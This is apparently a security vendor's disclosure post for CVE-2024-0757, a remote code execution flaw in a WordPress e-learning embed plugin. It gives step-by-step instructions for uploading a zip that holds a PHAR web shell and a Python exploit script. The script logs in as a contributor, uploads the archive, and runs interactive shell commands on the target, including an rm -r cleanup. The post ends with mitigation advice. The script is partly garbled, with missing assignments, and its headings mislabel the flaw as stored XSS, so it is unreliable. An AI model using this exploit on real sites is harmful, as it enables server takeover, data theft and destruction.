In recent times, WordPress has become a predominant platform for website development due to its user-friendly interface and extensive plugin ecosystem. However, this popularity also makes it a prime target for security vulnerabilities. One such critical vulnerability, identified as CVE-2024-0757, allows remote code execution (RCE) through insecure file uploads in a zip archive by users with contributor rights in Insert or Embed Articulate Content into WordPress plugin. This article delves into the discovery, exploitation, and potential impact of this vulnerability, along with recommendations for securing WordPress installations.

PluginInsert or Embed Articulate Content into WordPress <= 4.3000000023
CriticalVery High
All Time122 027
Active installations3 000+
Publicly PublishedMay 14, 2024
Last UpdatedMay 14, 2024
ResearcherDmtirii Ignatyev
OWASP TOP-10A1: Injection
Plugin Security Certification by CleanTalk
Logo of the plugin


January 16, 2024Plugin testing and vulnerability detection in the Insert or Embed Articulate Content into WordPress have been completed
January 16, 2024I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
May 14, 2024Registered CVE-2024-0757

Discovery of the Vulnerability

The CVE-2024-0757 vulnerability was discovered during routine testing of a popular WordPress plugin used for inserting or embedding Articulate content. This plugin is commonly employed to integrate e-learning content into WordPress sites. The vulnerability specifically affects the file upload mechanism for authors who can upload zip files containing e-learning content. The flaw was identified when it was found that an attacker could embed malicious files within the zip archive, leading to potential code execution on the server.

Understanding of Stored XSS attack’s

Remote Code Execution (RCE) is a type of vulnerability that allows an attacker to execute arbitrary code on a server remotely. In the context of WordPress, RCE can have devastating effects, enabling attackers to take control of the website, steal data, or deface web pages. Historically, WordPress and its plugins have faced several RCE vulnerabilities. For example, in 2020, a vulnerability in the File Manager plugin allowed attackers to upload malicious files and execute commands, highlighting the significant threat posed by insecure file upload mechanisms.

Exploiting the Stored XSS Vulnerability

Exploiting CVE-2024-0757 involves a few straightforward steps:


1) Go to http://your_site/wordpress/wp-admin/post-new.php and create new Post

2) Add e-Learning widget inside Page and upload a zip file in which will be two files. First – default HTML file like main.html, Second – Phar file with name like cmd.phar (inside this file will be PHP code)

3) After uploading check URL http://your_site/wordpress/wp-content/uploads/articulate_uploads/{name_of_zip}/cmd.phar?cmd=ls

4) You can use following exploit


import requests
import sys
from bs4 import BeautifulSoup
import time
import urllib3
import re

def send_request(host,login,password):

    target = f"{host}/wp-login.php"
    s = requests.Session()
    data = {
        "wp-submit":"Log In",
    request =, data=data)

    nonce_url = f"{host}/wp-admin/post-new.php"
    nonce_text = s.get(nonce_url)
    nonce_array ='_upload_file"\:"(.*?)"\,"_nonce_', nonce_text.text)
    nonce =
    new_id_array ='<input type=\'hidden\' id=\'post_ID\' name=\'post_ID\' value=\'(.*)\' \/>', nonce_text.text)
    new_id =
    print("Nonce value: " + nonce)
    print("New Post Id: " + new_id)
    upload_url = f"{host}/wp-admin/admin-ajax.php"
    upload_files = {
        "async-upload": ('', open('','rb'), 'application/zip')
    data_upload = {

    upload =, data=data_upload, files=upload_files)
    upload_regex ='folder"\:"(.*?)"\,"path', upload.text)
    while True:
    	print(" ")
    	print("Pwn3d!!! ------- Try to use command:")
    	cmd = ''
    	cmd_user = input("cmd > ")
    	if cmd_user == 'exit':
    	    rce_url = f"{host}/wp-content/uploads/articulate_uploads/{}/cmd.phar?cmd=rm -r ../{}"

    	    rce = requests.get(rce_url)
    	    rce_url = f"{host}/wp-content/uploads/articulate_uploads/{}/cmd.phar?cmd={cmd_user}"

    	    rce = requests.get(rce_url)

def main():
    if len(sys.argv) != 4:
        print("(+) usage: %s <target_url> <login_of_contributor> <password>"  % sys.argv[0])
        print('(+) eg: %s login password'  % sys.argv[0])
    host = sys.argv[1]
    login = sys.argv[2]
    password = sys.argv[3]

if __name__ == "__main__":

The potential risk of this vulnerability is significant, particularly for websites that allow multiple authors. An attacker exploiting this flaw could gain complete control over the WordPress site, leading to data breaches, website defacement, or the installation of further malicious software. In a real-world scenario, an attacker could leverage this vulnerability to exfiltrate sensitive data, deploy ransomware, or use the compromised site to launch further attacks against visitors.

Recommendations for Improved Security

To mitigate the risk posed by CVE-2024-0757 and similar vulnerabilities, the following measures are recommended:

  1. Plugin Security Reviews: Regularly audit and review plugins for security vulnerabilities, especially those handling file uploads.
  2. Restrict File Uploads: Limit file upload capabilities to trusted users and employ robust validation checks on uploaded files.
  3. Use Security Plugins: Implement security plugins that can detect and block suspicious activities, such as unexpected file uploads.
  4. Regular Backups: Maintain regular backups of your site to quickly recover in case of a security breach.

By taking proactive measures to address RCE vulnerabilities like CVE-2024-0757, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.

#WordPressSecurity #RCE #WebsiteSafety #StayProtected #VeryHighVulnerability

Use CleanTalk solutions to improve the security of your website


Create your CleanTalk account

By signing up, you agree with license. Have an account? Log in.
CVE-2024-0757 – Insert or Embed Articulate Content into WordPress – RCE via zip bypass (Contributor+) Critical-High – POC

3 thoughts on “CVE-2024-0757 – Insert or Embed Articulate Content into WordPress – RCE via zip bypass (Contributor+) Critical-High – POC

    • June 17, 2024 at 04:19

      Hello Brian.
      Thank you for your comment.
      We will verify the information and respond to you within 3 business days.

    • June 17, 2024 at 16:41

      Thank you for waiting.

      The publication of a vulnerability is part of a security process aimed at transparency and informing the community. Even if a vulnerability has been fixed, the community has the right to know about the issues developers faced and how they were resolved. Publishing a vulnerability can serve an educational purpose, helping other developers and organizations learn from past mistakes. This contributes to the improvement of development practices and the overall enhancement of security. Providing information about resolved vulnerabilities allows users to understand the importance of installing updates and maintaining up-to-date software versions. This helps reduce risks and protect user data.

      Best regards.


Leave a Reply

Your email address will not be published. Required fields are marked *